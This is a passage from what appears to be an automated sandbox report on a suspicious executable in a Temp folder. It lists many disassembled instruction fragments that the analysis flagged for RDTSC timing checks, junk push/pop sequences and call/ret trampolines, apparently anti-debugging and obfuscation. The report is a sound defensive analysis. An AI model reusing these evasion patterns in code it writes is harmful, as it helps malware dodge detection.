0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 call 00007FC4CC910597h 0x0000004c mov di, A341h 0x00000050 pop edi 0x00000051 mov edi, dword ptr [ebp+122D2F4Bh] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push edi 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D8315E second address: D83162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D83162 second address: D83168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D83168 second address: D8316E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D85562 second address: D85566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D85566 second address: D855DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FC4CCEF6AD8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov ebx, edi 0x00000025 sub dword ptr [ebp+1247226Ah], eax 0x0000002b push 00000000h 0x0000002d jng 00007FC4CCEF6AD7h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FC4CCEF6AD8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f clc 0x00000050 jmp 00007FC4CCEF6ADAh 0x00000055 xchg eax, esi 0x00000056 je 00007FC4CCEF6AE0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f pop esi 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D8CC25 second address: D8CC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D8CC2A second address: D8CC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D212E8 second address: D212EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D212EC second address: D212F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D907BA second address: D907BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D907BE second address: D907DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC4CCEF6AE0h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D8FF4A second address: D8FF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 ja 00007FC4CC910586h 0x0000000e jmp 00007FC4CC910590h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D90388 second address: D90391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D90391 second address: D903C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jg 00007FC4CC910586h 0x0000000f pop edi 0x00000010 push edx 0x00000011 jmp 00007FC4CC91058Dh 0x00000016 jo 00007FC4CC910586h 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC4CC91058Dh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D91D56 second address: D91D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6AE6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D91D70 second address: D91D8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC4CC910586h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC4CC91058Dh 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D298BF second address: D298D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6AE1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1DCD9 second address: D1DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9BF64 second address: D9BF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC4CCEF6AD6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9BF70 second address: D9BFB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FC4CC910586h 0x00000010 jmp 00007FC4CC910590h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push esi 0x0000001c jnl 00007FC4CC910586h 0x00000022 pop esi 0x00000023 push edx 0x00000024 jc 00007FC4CC910586h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9BFB7 second address: D9BFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9BFBD second address: D9BFC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C0E2 second address: D9C0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C0E8 second address: D9C11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC4CC910590h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC4CC910596h 0x00000012 jbe 00007FC4CC910586h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C11C second address: D9C125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C25A second address: D9C260 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C260 second address: D9C27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC4CCEF6AE5h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C424 second address: D9C42A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D9C42A second address: D9C431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0AA3 second address: DA0AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007FC4CC910586h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DA0AAF second address: DA0AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D707B3 second address: D707B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7086C second address: D70870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70870 second address: D70874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70C64 second address: D70C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E3B second address: D70E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC4CC910586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E46 second address: D70E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E5B second address: D70E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c ja 00007FC4CC910590h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E7F second address: D70E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E83 second address: D70E89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E89 second address: D70E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E8E second address: D70E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70E9D second address: D70EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70EA6 second address: D70EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70EAA second address: D70EE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FC4CCEF6AD8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2ED8h] 0x00000028 push 6A25881Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70EE0 second address: D70EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D70EE4 second address: D70EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6D2F4 second address: D6D2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6D2F8 second address: D6D2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6E973 second address: D6E978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D73B3A second address: D73B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D73B4B second address: D73B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D73B59 second address: D73B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D76AD0 second address: D76B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 jmp 00007FC4CC91058Eh 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 nop 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC4CC910588h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+122D2B9Dh] 0x00000038 movzx edi, di 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov bl, dl 0x00000044 mov ebx, 67C2B3A6h 0x00000049 mov eax, dword ptr [ebp+122D1445h] 0x0000004f push edi 0x00000050 sub dword ptr [ebp+122D3A93h], edi 0x00000056 pop edi 0x00000057 mov edi, dword ptr [ebp+122D2CF9h] 0x0000005d push FFFFFFFFh 0x0000005f mov edi, 08854D4Ch 0x00000064 mov dword ptr [ebp+12467B97h], edi 0x0000006a nop 0x0000006b je 00007FC4CC910598h 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007FC4CC910586h 0x00000079 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D76B5A second address: D76B83 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FC4CCEF6AE8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D76B83 second address: D76B88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D78C97 second address: D78C9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D78C9C second address: D78CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79BAF second address: D79BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79BB3 second address: D79BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79BB7 second address: D79BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7AB93 second address: D7AB9D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D716F4 second address: D716F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D716F8 second address: D716FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7BB00 second address: D7BB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB1F second address: D7CB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB23 second address: D7CB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7CB29 second address: D7CB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D801D3 second address: D801D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D823AD second address: D82454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC4CC910588h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12476725h], ebx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007FC4CC910590h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FC4CC910592h 0x00000044 mov eax, dword ptr [ebp+122D0D51h] 0x0000004a sub dword ptr [ebp+1245B88Eh], edx 0x00000050 push FFFFFFFFh 0x00000052 mov edi, dword ptr [ebp+122D2DC5h] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FC4CC910598h 0x00000061 jmp 00007FC4CC910592h 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D82454 second address: D82459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D82459 second address: D8245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71A66 second address: D71A70 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71A70 second address: D71A75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71B66 second address: D71BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FC4CCEF6AD8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 call 00007FC4CCEF6ADFh 0x00000028 jmp 00007FC4CCEF6AE2h 0x0000002d pop edx 0x0000002e lea eax, dword ptr [ebp+1248557Dh] 0x00000034 movzx edx, dx 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a jnl 00007FC4CCEF6AD6h 0x00000040 pop eax 0x00000041 push edi 0x00000042 